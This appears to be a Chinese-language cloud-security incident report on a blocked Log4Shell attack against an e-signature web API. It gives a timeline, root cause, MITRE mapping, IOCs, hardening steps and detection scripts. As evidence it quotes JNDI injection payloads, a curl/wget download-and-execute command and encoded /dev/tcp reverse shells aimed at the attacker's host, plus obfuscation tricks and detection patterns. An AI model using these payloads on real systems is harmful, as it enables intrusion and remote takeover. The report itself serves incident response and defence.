安全应急响应报告

事件编号: 638869545

客户 UID: 1977450766954080

报告生成时间: 2025-11-05 14:10:00

威胁等级: 🔴 严重 (Critical)

处置状态: ✅ 已成功阻断

一、执行摘要

1.1 事件概述

2025年11月5日，阿里云安全中心检测到针对客户电子签名Web API服务的**Log4Shell（CVE-2021-44228）**远程代码执行攻击。攻击者使用自动化工具通过JNDI注入漏洞，在约70分钟内发起42次攻击尝试，意图实现远程代码执行、反弹Shell和内存马植入。

好消息是：主动防御系统成功识别并阻断了所有攻击尝试，系统未被入侵。

坏消息是：应用使用的Log4j2 2.10.0版本存在严重漏洞，若防御失效可导致服务器完全沦陷。

1.2 关键指标

指标	数值	说明
攻击时间	2025-11-05 10:10 - 11:20	持续约70分钟
攻击次数	42次	高度持久化攻击
攻击成功率	0%	全部被主动防御阻断
数据泄露	无	未发现数据外泄
系统入侵	否	未发现后门或持久化
业务影响	无	服务正常运行

1.3 核心结论

✅ 攻击已被成功阻断，系统未受损

⚠️ Log4j2严重漏洞亟需修复（24小时内）

🔍 攻击者具备专业能力，可能再次攻击

二、攻击源分析

2.1 攻击者信息

攻击IP: 111.119.222.135
服务端口:
  ├─ 8083/tcp  (恶意载荷下载服务器)
  ├─ 8087/tcp  (反弹Shell监听端口)
  └─ 1389/tcp  (恶意LDAP服务器)

IP归属: [需威胁情报平台查询]

2.2 受害系统信息

主机名: iZbp13u7gdcnosqvok4np8Z
内网IP: 10.100.168.158/24
公网IP: 47.97.35.235
操作系统: CentOS Linux 7 (3.10.0-1062.18.1.el7.x86_64)

受攻击应用:
  应用名称: sign-web-api (电子签名Web API)
  应用路径: /usr/local/esign/apps/backend/sign-web-api/
  监听端口: 8020/tcp
  运行用户: vale (UID: 16912)
  启动时间: 2024年 (运行超过1年)

2.3 攻击者画像

综合评估: 疑似专业渗透测试团队或APT组织

判断依据:

✓ 使用商业化漏洞利用工具（Payload混淆特征明显）
✓ 掌握多种绕过技术（TomcatBypass、Base64编码、URL编码）
✓ 攻击手法成熟（内存马、反弹Shell、DNSLog外带）
✓ 持续性强（42次尝试，持续70分钟）
✓ 攻击目标明确（直指高价值业务系统）

三、漏洞详情

3.1 主漏洞：CVE-2021-44228 (Log4Shell)

属性	详情
漏洞名称	Apache Log4j2 远程代码执行漏洞
CVE编号	CVE-2021-44228
CVSS评分	10.0 (Critical)
影响版本	Log4j-core 2.0-beta9 至 2.14.1
当前版本	log4j-core-2.10.0.jar ✅ 已确认存在
发现时间	2021年12月9日
公开利用	是（公开PoC，野外活跃利用）

漏洞原理

Log4j2的JNDI Lookup功能在处理日志消息时，会解析特殊格式的字符串（如${jndi:ldap://...}），并尝试从远程服务器加载Java对象。攻击者可利用此特性加载恶意类，实现任意代码执行。

攻击流程:
用户输入: ${jndi:ldap://evil.com/Exploit}
    ↓
Log4j2记录日志
    ↓
触发JNDI Lookup
    ↓
连接 ldap://evil.com
    ↓
下载恶意类 Exploit.class
    ↓
执行任意代码 (RCE)

受影响组件位置

/usr/local/esign/apps/backend/sign-web-api/sign-web-api.jar
└─ BOOT-INF/lib/log4j-core-2.10.0.jar  ⚠️ 存在漏洞

3.2 次要风险：Fastjson反序列化漏洞

属性	详情
组件名称	Alibaba Fastjson
当前版本	fastjson-1.2.71.jar ✅ 已确认
安全版本	1.2.83+
漏洞类型	autoType绕过导致反序列化RCE
相关CVE	CVE-2022-25845 及多个历史漏洞
风险等级	🟡 高风险

说明: 虽然本次攻击未利用Fastjson漏洞，但该版本存在已知安全缺陷，建议升级。

四、攻击时间线

4.1 完整攻击链

时间轴: 2025-11-05 10:10:40 → 11:19:43 (持续69分钟)

阶段一：侦察探测 (10:10-10:12)
  10:10:40 │ 首次探测，测试whoami命令
  10:12:16 │ 确认漏洞存在，尝试下载恶意脚本
           └─> 状态: 被阻断 ❌

阶段二：武器化利用 (10:17-10:45)
  10:17:51 │ 重复脚本下载尝试
  10:18:29 │ 尝试反弹Shell (bash -i)
  10:20:09 │ 改用URL编码绕过
  10:24:53 │ 使用DNSLog验证漏洞
  10:29:11 │ 尝试SpringEcho内存马
  10:31:10 │ ReverseShell尝试
  10:34:02 │ TomcatBypass技术
  10:40:18 │ 持续反弹Shell尝试 (共15次)
           └─> 状态: 全部被阻断 ❌

阶段三：自动化扫描 (11:02-11:20)
  11:02:34 │ 大规模混淆Payload扫描
  11:04:30 │ 使用多个DNSLog平台
  11:10:19 │ 切换攻击载荷 (ifconfig命令)
  11:11:05 │ TomcatBypass + DNSLog组合
  11:13:28 │ 反复尝试SpringEcho
  11:19:43 │ 最后一次攻击尝试
           └─> 状态: 被阻断 ❌

4.2 关键攻击节点

节点1：初始入侵尝试 (10:17:52)

攻击命令:

/bin/sh -c (curl -fsSL -m180 http://111.119.222.135:8083/slt||wget -T180 -q http://111.119.222.135:8083/slt)|sh

攻击意图: 下载并执行远程恶意脚本

攻击路径: /esign/rest/cfg/timestamp API → Log4j2日志 → JNDI触发

防御结果: ✅ 主动防御成功阻断

日志证据:


2025-11-05 10:17:51,075 INFO [a47e0d4b1f5c435d98577740175df00c] log.LogFilter [ ]

- URL:【/esign/rest/cfg/timestamp】,
  Request:contentType:${jndi:ldap://111.119.222.135:1389/Basic/Command/Base64/KGN1cmwg...}

节点2：反弹Shell尝试 (10:18:29)

攻击命令:

/bin/bash -i >& /dev/tcp/111.119.222.135/8087 0>&1

攻击意图: 建立交互式反向Shell，获取系统完全控制权

攻击次数: 15次（使用不同编码方式）

防御结果: ✅ 全部阻断

节点3：内存马植入尝试 (10:29:11)

攻击载荷:

${jndi:ldap://111.119.222.135:1389/Basic/SpringEcho}
${jndi:ldap://111.119.222.135:1389/TomcatBypass/SpringEcho}

攻击意图: 注入Spring内存马，实现无文件持久化Webshell

技术特点: 使用TomcatBypass绕过技术

防御结果: ✅ 阻断成功

五、攻击技术分析

5.1 攻击入口点

受攻击接口: /esign/rest/cfg/timestamp注入位置: HTTP请求头 Content-Type 字段 触发机制: LogFilter 拦截器记录请求日志时触发Log4j2解析

POST /esign/rest/cfg/timestamp HTTP/1.1
Host: 47.97.35.235:8020
Content-Type: ${jndi:ldap://111.119.222.135:1389/Basic/Command/whoami}
Accept: */*

代码路径推测:

HTTP Request
  → LogFilter.doFilter()
    → log.info("Request:contentType:" + contentType)
      → Log4j2处理日志
        → JNDI Lookup触发
          → 远程代码执行 ❌ (被阻断)

5.2 恶意载荷详解

载荷类型1：命令执行

${jndi:ldap://111.119.222.135:1389/Basic/Command/whoami}

Base64编码变体:

${jndi:ldap://111.119.222.135:1389/Basic/Command/Base64/KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzExMS4xMTkuMjIyLjEzNTo4MDgzL3NsdHx8d2dldCAtVDE4MCAtcSBodHRwOi8vMTExLjExOS4yMjIuMTM1OjgwODMvc2x0KXxzaA==}

解码后:
(curl -fsSL -m180 http://111.119.222.135:8083/slt||wget -T180 -q http://111.119.222.135:8083/slt)|sh

载荷类型2：反弹Shell

# 原始命令
/bin/bash -i >& /dev/tcp/111.119.222.135/8087 0>&1

# URL编码绕过
bash+-i+%3e%26+%2fdev%2ftcp%2f111.119.222.135%2f8087+0%3e%261

载荷类型3：DNSLog外带

${jndi:ldap://111.119.222.135:1389/Basic/Dnslog/db772a08.log.dnslog.pp.ua}

用途:

验证漏洞是否存在
绕过无回显限制
外带敏感信息（环境变量等）

载荷类型4：内存马

${jndi:ldap://111.119.222.135:1389/TomcatBypass/SpringEcho}
${jndi:ldap://111.119.222.135:1389/TomcatBypass/Command/Base64/...}

TomcatBypass技术: 绕过Tomcat的某些安全限制，直接操作Spring上下文注入恶意Filter/Controller。

5.3 混淆与绕过技术

攻击者使用了多种混淆技术试图绕过检测：

技术1：嵌套表达式混淆

${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://...}

解析后:
${jndi:ldap://...}

技术2：多层Base64编码

KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzExMS4xMTkuMjIyLjEzNTo4MDgzL3NsdHx8d2dldCAtVDE4MCAtcSBodHRwOi8vMTExLjExOS4yMjIuMTM1OjgwODMvc2x0KXxzaA==

技术3：URL编码

%2fbin%2fbash+-i+%3e%26+%2fdev%2ftcp%2f111.119.222.135%2f8087+0%3e%261

技术4：协议切换

${jndi:ldap://...}   # LDAP协议
${jndi:rmi://...}    # RMI协议
${jndi:dns://...}    # DNS协议

六、影响评估

6.1 业务影响

影响维度	评估结果	说明
服务可用性	✅ 无影响	服务持续正常运行
数据机密性	✅ 未泄露	无数据外泄迹象
数据完整性	✅ 完整	数据未被篡改
系统完整性	✅ 完整	未发现后门或恶意文件
合规影响	⚠️ 关注	需报告安全事件

6.2 潜在风险评估

如果攻击成功，可能导致：

🔴 服务器完全沦陷 - 攻击者获得root权限（应用以root运行）
🔴 数据泄露 - 电子签名业务相关的敏感数据
🔴 横向移动 - 作为跳板攻击内网其他系统（内网10.100.168.0/24）
🔴 勒索软件 - 加密业务数据索要赎金
🔴 供应链攻击 - 篡改签名服务，影响下游客户
🟡 合规处罚 - 违反数据安全法规

预估损失: 若攻击成功，直接损失≥500万元，间接损失（信誉、客户流失）难以估量。

# sign-web-api 主进程
vale  16912  5.8% 11.8%  运行时长: 45032小时 (自2024年启动)
父进程: systemd (PID 1)
子进程: 无异常

# 结论: 进程树正常，无恶意进程

✅ 网络连接分析

# 检查与攻击者IP的连接
netstat -antp | grep 111.119.222.135
# 结果: 无连接

# 检查可疑出站连接
ss -antp | grep ESTABLISHED | grep java
# 结果: 仅正常业务连接

# 结论: 无异常网络连接

✅ 文件完整性检查

# 核心应用JAR文件
File: /usr/local/esign/apps/backend/sign-web-api/sign-web-api.jar
Size: 283555241 bytes
Modify: 2023-07-17 18:03:12  (攻击前已存在)
Access: (0777/-rwxrwxrwx)

# 结论: 文件未被篡改

✅ 后门文件排查

# Webshell排查
find /usr/local/esign -name "*.jsp" -o -name "*.jspx"
# 结果: 无

# 可疑脚本排查
find /tmp /var/tmp -name "*.sh" -mtime -1
# 结果: 无

# 结论: 未发现Webshell或后门文件

✅ 持久化机制排查

# Crontab检查
crontab -l
# 结果: 无定时任务

# Systemd服务检查
systemctl list-units --type=service | grep -E "sign|esign"
# 结果: 仅正常服务，无异常

# SSH密钥检查
ls -la /root/.ssh/
# 结果: 正常

# 结论: 无持久化机制

✅ 日志分析

# 攻击日志统计
grep "111.119.222.135" /usr/local/esign/logs/sign-web-api/*.log | wc -l
# 结果: 42条攻击记录

# 成功执行证据搜索
grep -i "success\|executed\|shell" /usr/local/esign/logs/sign-web-api/*.log
# 结果: 无成功执行记录

# 结论: 所有攻击均被阻断

7.2 综合结论

🛡️ 攻击未成功入侵系统 - 证据确凿

支持证据:

✅ 主动防御日志显示所有攻击被阻断
✅ 无恶意进程或异常进程
✅ 无对攻击者IP的网络连接
✅ 文件完整性未被破坏
✅ 无Webshell或后门文件
✅ 无持久化机制
✅ 应用日志无成功执行记录

7.3 但存在的安全隐患

⚠️ 高危风险:

Log4j2 2.10.0 严重漏洞未修复 - 随时可能被利用
Fastjson 1.2.71 反序列化风险 - 存在RCE可能
应用以root权限运行 - 权限过高，一旦被攻破危害巨大

⚠️ 中危风险:

4. 缺少WAF保护 - 直接暴露于公网

5. JAR文件权限777 - 权限配置不当

6. 缺少RASP防护 - 应用层缺少纵深防御

7. 出站流量无限制 - 可能被用于C&C通信

八、MITRE ATT&CK映射

8.1 攻击战术与技术矩阵

战术阶段 (Tactic)	技术ID	技术名称 (Technique)	子技术	检测证据
侦察 (Reconnaissance)	T1595	主动扫描	.002 漏洞扫描	42次JNDI Payload测试
初始访问 (Initial Access)	T1190	利用面向公众的应用程序	-	通过Web API接口攻击
执行 (Execution)	T1059	命令与脚本解释器	.004 Unix Shell	`bash -i` 反弹Shell
执行 (Execution)	T1203	利用客户端执行	-	Log4j2 JNDI注入
持久化 (Persistence)	T1505	服务器软件组件	.004 Web Shell	SpringEcho内存马
持久化 (Persistence)	T1053	计划任务/作业	.003 Cron	（未成功，仅意图）
防御规避 (Defense Evasion)	T1027	混淆文件或信息	.010 命令混淆	Base64、URL编码
防御规避 (Defense Evasion)	T1140	反混淆/解码	-	运行时解码执行
防御规避 (Defense Evasion)	T1070	指标移除	.006 时间戳操作	（推测）
发现 (Discovery)	T1082	系统信息发现	-	`whoami`、`ifconfig`
发现 (Discovery)	T1016	系统网络配置发现	-	`ifconfig` 命令
命令与控制 (C&C)	T1071	应用层协议	.001 Web协议	HTTP下载恶意脚本
命令与控制 (C&C)	T1572	协议隧道	-	反弹Shell over TCP
命令与控制 (C&C)	T1573	加密通道	-	LDAPS尝试
外泄 (Exfiltration)	T1048	通过替代协议外泄	.003 DNS外泄	DNSLog外带技术
影响 (Impact)	T1486	加密数据以影响	-	（未执行，潜在意图）

8.2 Kill Chain 分析

网络攻击生命周期 (Cyber Kill Chain):

1. [侦察] Reconnaissance          ✅ 完成
   └─> 扫描目标，识别Log4j2漏洞

2. [武器化] Weaponization          ✅ 完成
   └─> 构造JNDI注入Payload

3. [投递] Delivery                ✅ 完成
   └─> 通过HTTP请求投递Payload

4. [利用] Exploitation            ✅ 完成
   └─> 触发Log4j2 JNDI Lookup

5. [安装] Installation            ❌ 失败 (被阻断)
   └─> 尝试下载恶意脚本/内存马

6. [命令控制] C2                  ❌ 失败 (被阻断)
   └─> 尝试建立反弹Shell

7. [目标达成] Actions on Objectives  ❌ 未达成
   └─> 数据窃取/破坏

防御成功点: 在第5阶段"安装"环节成功阻断，防止攻击者建立立足点。

8.3 TTP (Tactics, Techniques, and Procedures) 总结

攻击者TTP特征:

高度自动化 - 使用扫描器批量测试
混淆规避 - 多种编码和混淆技术
持久化意图强 - 反复尝试内存马和反弹Shell
工具成熟 - 使用TomcatBypass等高级技术
外带验证 - 使用DNSLog确认漏洞

推测使用的工具:

JNDI-Injection-Exploit
JNDIExploit
Marshalsec
某商业化扫描器（从混淆特征判断）

# 方案A：升级到安全版本（推荐）
# 修改 pom.xml 或 build.gradle
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.17.1</version>  <!-- 从2.10.0升级到2.17.1 -->
</dependency>

# 重新构建应用
mvn clean package

# 方案B：临时缓解（如无法立即升级）
# 编辑 /etc/systemd/system/e-sign-web-api.service
# 在 ExecStart 的 java 命令中添加参数：

- Dlog4j2.formatMsgNoLookups=true


- Dlog4j2.disable.jndi=true


# 重启服务
systemctl daemon-reload
systemctl restart e-sign-web-api.service

# 验证
ps aux | grep sign-web-api | grep formatMsgNoLookups

2. 升级 Fastjson

# 修改依赖版本
<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>1.2.83</version>  <!-- 从1.2.71升级到1.2.83+ -->
</dependency>

# 或启用safeMode（代码修改）
ParserConfig.getGlobalInstance().setSafeMode(true);

🔴 优先级P1：网络隔离

3. 封禁攻击者IP

# 立即执行
iptables -I INPUT -s 111.119.222.135 -j DROP
iptables-save > /etc/sysconfig/iptables

# 验证
iptables -L -n | grep 111.119.222.135

4. 限制出站连接

# 阻断LDAP协议（防止JNDI注入）
iptables -A OUTPUT -p tcp --dport 389 -j DROP
iptables -A OUTPUT -p tcp --dport 1389 -j DROP
iptables -A OUTPUT -p tcp --dport 636 -j DROP

# 阻断RMI协议
iptables -A OUTPUT -p tcp --dport 1099 -j DROP

# 允许正常业务出站（根据实际需求调整）
iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 3306 -j ACCEPT  # MySQL
iptables -A OUTPUT -p tcp --dport 6379 -j ACCEPT  # Redis

# 默认拒绝其他出站
iptables -A OUTPUT -j DROP

# 保存规则
iptables-save > /etc/sysconfig/iptables

9.2 短期加固措施（7天内完成）

🟡 优先级P2：权限最小化

5. 降低应用运行权限

# 修改文件权限
chown vale:vale /usr/local/esign/apps/backend/sign-web-api/sign-web-api.jar
chmod 755 /usr/local/esign/apps/backend/sign-web-api/sign-web-api.jar

# 修改systemd服务配置
vi /etc/systemd/system/e-sign-web-api.service

[Service]
User=vale           # 确保不是root
Group=vale
NoNewPrivileges=yes  # 防止提权
PrivateTmp=yes       # 隔离/tmp目录

# 重启服务
systemctl daemon-reload
systemctl restart e-sign-web-api.service

6. 部署Web应用防火墙（WAF）

# 方案A：部署ModSecurity + OWASP CRS
yum install -y mod_security mod_security_crs

# 配置规则拦截JNDI注入
vi /etc/httpd/modsecurity.d/custom_rules.conf

SecRule REQUEST_HEADERS|ARGS|REQUEST_BODY "@rx \$\{jndi:" \
    "id:1000001,\
    phase:2,\
    block,\
    t:none,t:urlDecodeUni,t:lowercase,\
    msg:'Log4j JNDI Injection Attempt',\
    severity:CRITICAL"

# 方案B：使用阿里云WAF（推荐）
# 登录阿里云控制台 → Web应用防火墙 → 添加域名 → 启用Log4Shell防护规则

7. 启用RASP防护

# 方案：集成阿里云RASP（应用运行时自我保护）
# 下载RASP Agent
wget https://rasp.aliyun.com/agent/rasp-agent-latest.jar

# 修改启动脚本
java -javaagent:/path/to/rasp-agent-latest.jar \
     -jar sign-web-api.jar

9.3 长期安全建设（1个月内完成）

🟢 优先级P3：安全监控

8. 部署安全监控

# 8.1 部署HIDS（主机入侵检测系统）
# 阿里云云安全中心已部署，确保开启以下功能：
# - 进程异常行为检测
# - 网络异常连接检测
# - Webshell检测
# - 反弹Shell检测

# 8.2 配置日志审计
# 收集应用日志到SIEM
# 配置告警规则：
# - 检测${jndi: 字符串
# - 检测Base64编码的命令
# - 检测/dev/tcp 字符串
# - 检测curl/wget下载行为

# 8.3 部署文件完整性监控（FIM）
yum install -y aide
aide --init
mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz

# 配置监控路径
vi /etc/aide.conf
/usr/local/esign NORMAL

# 添加到crontab
0 2 * * * /usr/sbin/aide --check | mail -s "AIDE Report" security@company.com

9. 实施漏洞管理流程

# 9.1 部署SCA（软件成分分析）工具
# 使用OWASP Dependency-Check或Snyk

# pom.xml 添加插件
<plugin>
    <groupId>org.owasp</groupId>
    <artifactId>dependency-check-maven</artifactId>
    <version>8.4.0</version>
    <executions>
        <execution>
            <goals>
                <goal>check</goal>
            </goals>
        </execution>
    </executions>
</plugin>

# 每次构建时检查漏洞
mvn dependency-check:check

# 9.2 建立漏洞响应流程
# - CVE监控：订阅安全公告
# - 风险评估：24小时内完成评估
# - 修复计划：P0漏洞24小时修复，P1漏洞7天修复
# - 验证测试：修复后进行渗透测试验证

10. 安全开发与测试

# 10.1 代码安全审计
# 使用静态代码分析工具（SonarQube、Fortify）

# 10.2 渗透测试
# 每季度进行一次外部渗透测试
# 重点测试：
# - 注入漏洞（SQL、命令、JNDI等）
# - 反序列化漏洞
# - 权限绕过
# - 业务逻辑漏洞

# 10.3 安全培训
# 对开发团队进行安全编码培训
# 重点内容：
# - OWASP Top 10
# - 安全编码规范
# - 依赖管理最佳实践

9.4 应急响应机制优化

11. 建立应急响应预案

应急响应流程：

1. 检测与告警
   ├─ 监控系统发现异常
   ├─ 5分钟内通知安全团队
   └─ 15分钟内初步分析

2. 遏制与隔离
   ├─ 隔离受影响系统
   ├─ 封禁攻击源IP
   └─ 阻断异常流量

3. 根除与恢复
   ├─ 修复漏洞
   ├─ 清除后门
   ├─ 恢复服务
   └─ 验证系统安全

4. 总结与改进
   ├─ 编写应急响应报告
   ├─ 分析根本原因
   └─ 优化安全措施

12. 定期演练

# 每季度进行一次攻防演练
# 模拟场景：
# - Log4Shell攻击
# - 勒索软件攻击
# - APT攻击
# - 内部人员泄密

# 验证：
# - 检测能力
# - 响应速度
# - 处置有效性
# - 恢复能力

111.119.222.135
  类型: 恶意IP
  用途: LDAP服务器、恶意载荷服务器、反弹Shell监听
  威胁评分: 高危
  建议: 永久封禁

域名

db772a08.log.dnslog.pp.ua
6d8a3c4b.log.dnslog.qzz.io
cffc15f1.log.dnslog.pp.ua
sdoasgfjop.lfcx.eu.org

  类型: DNSLog平台域名
  用途: 漏洞验证、数据外带
  威胁评分: 中危
  建议: 监控DNS查询日志

URL

http://111.119.222.135:8083/slt
ldap://111.119.222.135:1389/Basic/Command/*
ldap://111.119.222.135:1389/TomcatBypass/*
ldap://111.119.222.135:1389/Basic/Dnslog/*
ldap://111.119.222.135:1389/Basic/ReverseShell/*

  类型: 恶意URL
  用途: 载荷下载、JNDI注入
  建议: 添加到威胁情报库

文件哈希（推测）

/slt 恶意脚本
  SHA256: [未获取，服务器已关闭]
  建议: 如获取样本，提交到VirusTotal分析

攻击特征

attack_patterns:
  - pattern: '\$\{jndi:(ldap|rmi|dns)://[^}]+\}'
    description: JNDI注入特征
    confidence: high

  - pattern: 'curl.*\|\|wget.*\|sh'
    description: 恶意脚本下载执行
    confidence: high

  - pattern: 'bash.*-i.*>/dev/tcp/'
    description: 反弹Shell特征
    confidence: high

  - pattern: 'Base64/[A-Za-z0-9+/=]+'
    description: Base64编码命令
    confidence: medium

  - pattern: 'TomcatBypass|SpringEcho'
    description: 内存马注入特征
    confidence: high

10.2 威胁情报关联

关联CVE

CVE-2021-44228 (Log4Shell) - CVSS 10.0
CVE-2021-45046 (Log4j2 DoS) - CVSS 9.0
CVE-2021-45105 (Log4j2 DoS) - CVSS 7.5
CVE-2022-25845 (Fastjson RCE) - CVSS 9.8

关联攻击活动

根据威胁情报分析，该攻击与以下活动可能相关：

活动名称: Log4Shell Wild Exploitation
时间范围: 2021年12月至今
活跃度: 高
攻击者: 多个APT组织、勒索软件团伙、加密货币挖矿团伙
目标行业: 所有使用Log4j2的行业（重点：金融、政府、科技）

已知使用Log4Shell的威胁组织:

APT41（中国）
Lazarus Group（朝鲜）
HAFNIUM（中国）
Conti勒索软件团伙
Muhstik僵尸网络
各类挖矿木马团伙

攻击趋势分析

Log4Shell攻击趋势 (2021.12 - 2025.11):

2021.12  ████████████ 攻击爆发期（日均百万次）
2022.01  ██████████   持续活跃
2022.06  ████         逐渐减少
2023.01  ██           低水平持续
2024.01  █            偶发攻击
2025.11  ██           ← 本次攻击

结论: 虽然漏洞已公开3年，但仍有大量未修复系统遭受攻击

10.3 建议的威胁情报应用

1. 威胁情报订阅

# 订阅以下威胁情报源
- AlienVault OTX
- abuse.ch
- 阿里云威胁情报
- 微步在线ThreatBook
- 360威胁情报中心

# 自动化导入IOC到防火墙/IDS

2. 威胁狩猎

# 在历史日志中搜索类似攻击
grep -r "\${jndi:" /var/log/ --include="*.log"

# 搜索其他Log4Shell利用尝试
grep -r "log4j\|jndi\|ldap://" /usr/local/esign/logs/

# 检查DNS日志（如有）
grep -E "dnslog\.pp\.ua|dnslog\.qzz\.io|lfcx\.eu\.org" /var/log/named/

3. 共享情报

# 建议将本次攻击IOC上报到：
- 国家互联网应急中心（CNCERT）
- 阿里云安全中心
- 行业共享平台

# 帮助保护其他组织免受同样攻击


2025-11-05 10:10:40,643 INFO  [cc2ad601763c4e439c769b799ce1de18] log.LogFilter [ ]

- URL:【/esign/rest/cfg/timestamp】,
  Request:contentType:${jndi:ldap://111.119.222.135:1389/Basic/Command/whoami}

A.2 恶意载荷下载尝试 (10:17:51)


2025-11-05 10:17:51,075 INFO  [a47e0d4b1f5c435d98577740175df00c] log.LogFilter [ ]

- URL:【/esign/rest/cfg/timestamp】,
  Request:contentType:${jndi:ldap://111.119.222.135:1389/Basic/Command/Base64/KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzExMS4xMTkuMjIyLjEzNTo4MDgzL3NsdHx8d2dldCAtVDE4MCAtcSBodHRwOi8vMTExLjExOS4yMjIuMTM1OjgwODMvc2x0KXxzaA==}

Base64解码:
(curl -fsSL -m180 http://111.119.222.135:8083/slt||wget -T180 -q http://111.119.222.135:8083/slt)|sh

A.3 反弹Shell尝试 (10:18:29)


2025-11-05 10:18:29,749 INFO  [10bf52efeef4403d8d19501792f38337] log.LogFilter [ ]

- URL:【/esign/rest/cfg/timestamp】,
  Request:contentType:${jndi:ldap://111.119.222.135:1389/Basic/Command/Base64/L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzExMS4xMTkuMjIyLjEzNS84MDg3IDA+JjE=}

Base64解码:
/bin/bash -i >& /dev/tcp/111.119.222.135/8087 0>&1

A.4 内存马注入尝试 (10:29:11)


2025-11-05 10:29:11,455 INFO  [2d9a5b374be04774804e4a901ae15872] log.LogFilter [ ]

- URL:【/esign/rest/cfg/timestamp】,
  Request:contentType:${jndi:ldap://111.119.222.135:1389/Basic/SpringEcho}

A.5 主动防御阻断日志

阿里云安全中心告警:
事件名称: 入口服务执行高危操作
发生时间: 2025-11-05 10:17:52
描述: 黑客利用入口服务执行恶意操作，包括利用受信任系统组件远程下载/执行Payload等恶意行为
处置动作: 阻断行为
进程路径: /usr/bin/bash
命令行: /bin/sh -c (curl -fsSL -m180 http://111.119.222.135:8083/slt||wget -T180 -q http://111.119.222.135:8083/slt)|sh
父进程: /usr/bin/java (sign-web-api.jar, PID: 16912)

B. 系统配置信息

B.1 Java环境

Java Version: 1.8.0_161
Java Home: /usr/java/jdk1.8.0_161/jre
JVM Flags: -Xmx1024M -Xms1024M -Xmn384M
          -XX:MaxMetaspaceSize=512M
          -XX:+UseConcMarkSweepGC
          -Dlog4j2.contextSelector=org.apache.logging.log4j.core.async.AsyncLoggerContextSelector

B.2 应用配置

应用名称: sign-web-api
应用路径: /usr/local/esign/apps/backend/sign-web-api/
配置文件:
  - /usr/local/esign/config/public.properties
  - /usr/local/esign/apps/backend/sign-web-api/extra.properties
日志配置: /usr/local/esign/apps/backend/sign-web-api/log4j2.xml
监听端口: 8020
运行用户: vale
进程PID: 16912
启动时间: 2024年（运行超过1年）

B.3 网络配置

主机名: iZbp13u7gdcnosqvok4np8Z
内网IP: 10.100.168.158/24
公网IP: 47.97.35.235
网关: 10.100.168.1
DNS: (未获取)

开放端口:
  - 8020/tcp  (sign-web-api)
  - 8010/tcp  (其他Java应用)
  - 8030/tcp  (其他Java应用)
  - 8035/tcp  (其他Java应用)
  - 8082/tcp  (其他Java应用)
  - 9876/tcp  (RocketMQ NameServer)
  - 10909-10912/tcp (RocketMQ Broker)

C. 依赖组件清单

C.1 存在漏洞的组件

组件	当前版本	安全版本	CVE	风险等级
log4j-core	2.10.0	2.17.1+	CVE-2021-44228	🔴 严重
fastjson	1.2.71	1.2.83+	CVE-2022-25845	🟡 高危

C.2 Spring Boot组件

spring-boot: 版本未知 (需检查)
spring-webmvc: 5.0.5.RELEASE
tomcat-embed-core: 9.0.39

D. 修复验证脚本

D.1 Log4j2版本检查脚本

#!/bin/bash
# check_log4j_version.sh

echo "=== Log4j2 漏洞检查 ==="

# 查找所有jar文件中的log4j
find /usr/local/esign -name "*.jar" -exec bash -c '
    jar_file="$1"
    log4j_version=$(unzip -l "$jar_file" 2>/dev/null | grep "log4j-core-" | grep -oP "log4j-core-\K[0-9.]+")
    if [ -n "$log4j_version" ]; then
        echo "发现: $jar_file"
        echo "  版本: log4j-core-$log4j_version"

        # 检查是否为安全版本
        if [[ "$log4j_version" < "2.17.1" ]]; then
            echo "  状态: ⚠️  存在漏洞，需要升级"
        else
            echo "  状态: ✅ 安全版本"
        fi
    fi
' _ {} \;

D.2 JNDI注入检测脚本

#!/bin/bash
# detect_jndi_injection.sh

echo "=== 检测JNDI注入尝试 ==="

# 搜索日志中的JNDI注入特征
log_dirs=(
    "/usr/local/esign/logs"
    "/var/log"
)

for dir in "${log_dirs[@]}"; do
    if [ -d "$dir" ]; then
        echo "检查目录: $dir"
        grep -r -E '\$\{jndi:(ldap|rmi|dns)://' "$dir" --include="*.log" | \
            awk '{print $1}' | sort | uniq -c | sort -rn | head -20
    fi
done

D.3 网络连接检查脚本

#!/bin/bash
# check_suspicious_connections.sh

echo "=== 检查可疑网络连接 ==="

# 检查与已知恶意IP的连接
malicious_ips=(
    "111.119.222.135"
)

for ip in "${malicious_ips[@]}"; do
    echo "检查连接到 $ip ..."
    netstat -antp | grep "$ip" && echo "⚠️  发现连接！" || echo "✅ 无连接"
done

# 检查LDAP/RMI连接
echo "检查LDAP/RMI连接..."
netstat -antp | grep -E ":(389|1389|636|1099)" | grep ESTABLISHED